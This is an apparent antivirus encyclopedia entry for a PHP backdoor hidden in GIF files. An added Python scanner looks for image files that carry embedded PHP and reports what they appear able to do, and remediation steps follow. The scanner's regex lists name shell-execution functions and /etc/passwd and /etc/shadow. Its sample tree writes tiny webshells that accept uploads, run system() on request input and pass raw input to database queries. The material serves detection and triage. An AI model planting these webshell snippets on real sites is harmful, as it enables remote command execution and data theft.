PHP/Rst.CO!tr.bdr is a generic detection for a backdoor Trojan. Because the detection is generic, the behaviour of individual samples varies.
Below are some of the observed characteristics/behaviours:
- This malware may be implanted on compromised websites.
- Once implanted, the file may masquerade as a GIF image while carrying embedded PHP code that may provide some or all of the following capabilities:
  - file upload
  - command-line execution
  - database manipulation
  - disclosure of user information
  - password-cracking techniques
- Figure 1: Malware.
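A triage check for the pattern described above, added here as an example and not part of the Fortinet entry: it walks a web root and reports image-suffixed files, or any file whose bytes begin with a GIF header, that also contain a PHP open tag, and tags each hit with the capability categories listed above. The indicator function lists, the sample file names and the constructed sample tree are my own assumptions chosen for illustration, not signatures taken from the detection.

```python
"""Triage scan for image files that carry embedded PHP (e.g. GIF/PHP polyglots).

Added example: a heuristic scanner, not Fortinet's signature logic. The
indicator patterns are my own choices for illustration.
"""
import os
import re
import tempfile
from pathlib import Path

GIF_MAGIC = (b"GIF87a", b"GIF89a")
IMAGE_SUFFIXES = {".gif", ".jpg", ".jpeg", ".png", ".ico"}
PHP_OPEN_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)

# One indicator set per capability named in the entry. Function names are
# assumed heuristics; tune them for the code base you are scanning.
INDICATORS = {
    "file_upload": [rb"move_uploaded_file\s*\(", rb"\$_FILES\b"],
    "command_execution": [rb"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\("],
    "database": [rb"\b(?:mysqli?_query|mysqli_connect|mysql_connect|new\s+PDO)\b"],
    "user_info": [rb"\bphpinfo\s*\(", rb"\bposix_getpwuid\s*\(", rb"/etc/passwd"],
    "credential_cracking": [rb"\bcrypt\s*\(", rb"\bpassword_verify\s*\(", rb"/etc/shadow"],
}


def inspect_file(path):
    """Return a finding dict for an image-looking file with a PHP open tag, else None.

    Two shapes are flagged: an image-suffixed file that contains PHP, and any
    file (whatever its suffix) that starts with a GIF header but contains PHP.
    """
    path = Path(path)
    data = path.read_bytes()
    if not PHP_OPEN_TAG.search(data):
        return None
    looks_like_gif = data.startswith(GIF_MAGIC)
    if path.suffix.lower() not in IMAGE_SUFFIXES and not looks_like_gif:
        return None  # ordinary PHP source; outside the scope of this check
    caps = sorted(name for name, pats in INDICATORS.items()
                  if any(re.search(p, data) for p in pats))
    return {"path": str(path), "gif_header": looks_like_gif, "capabilities": caps}


def scan_webroot(root):
    """Walk a web root and return findings sorted by path."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            finding = inspect_file(Path(dirpath) / name)
            if finding:
                findings.append(finding)
    return sorted(findings, key=lambda f: f["path"])


# Minimal valid 1x1 GIF, used as the benign sample and as the polyglot prefix.
TINY_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
            b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")


def build_sample_webroot():
    """Write a constructed sample tree to a temp dir and return its path (test data, not real malware)."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "images").mkdir()
    (root / "images" / "benign.gif").write_bytes(TINY_GIF)
    # Polyglot: valid GIF bytes followed by PHP that accepts uploads and runs commands.
    (root / "images" / "logo.gif").write_bytes(
        TINY_GIF
        + b"<?php if(isset($_FILES['f'])){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}"
        b" echo system($_GET['c']); ?>")
    # A .php file given a GIF header to slip past an upload filter; it talks to the database.
    (root / "upload.php").write_bytes(
        b"GIF89a\n<?php $r=mysqli_query($db,$_POST['q']); var_dump($r); ?>")
    # Ordinary application code: must not be reported.
    (root / "index.php").write_bytes(b"<?php echo 'hello'; ?>")
    return str(root)


if __name__ == "__main__":
    for f in scan_webroot(build_sample_webroot()):
        print(f["path"], "gif_header=%s" % f["gif_header"], ",".join(f["capabilities"]))
```

Point `scan_webroot()` at a real document root to triage a suspected site; treat each hit as a lead for manual review, since the indicator lists are deliberately broad and legitimate code can trip them.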
- FortiGate Systems
- Check the main screen of the FortiGate unit's web interface to ensure that the latest AV/NIDS database has been downloaded and installed; if required, enable the "Allow Push Update" option.
- Quarantine or delete detected files and replace them with clean backup copies, taking the backup from a point known to predate the compromise.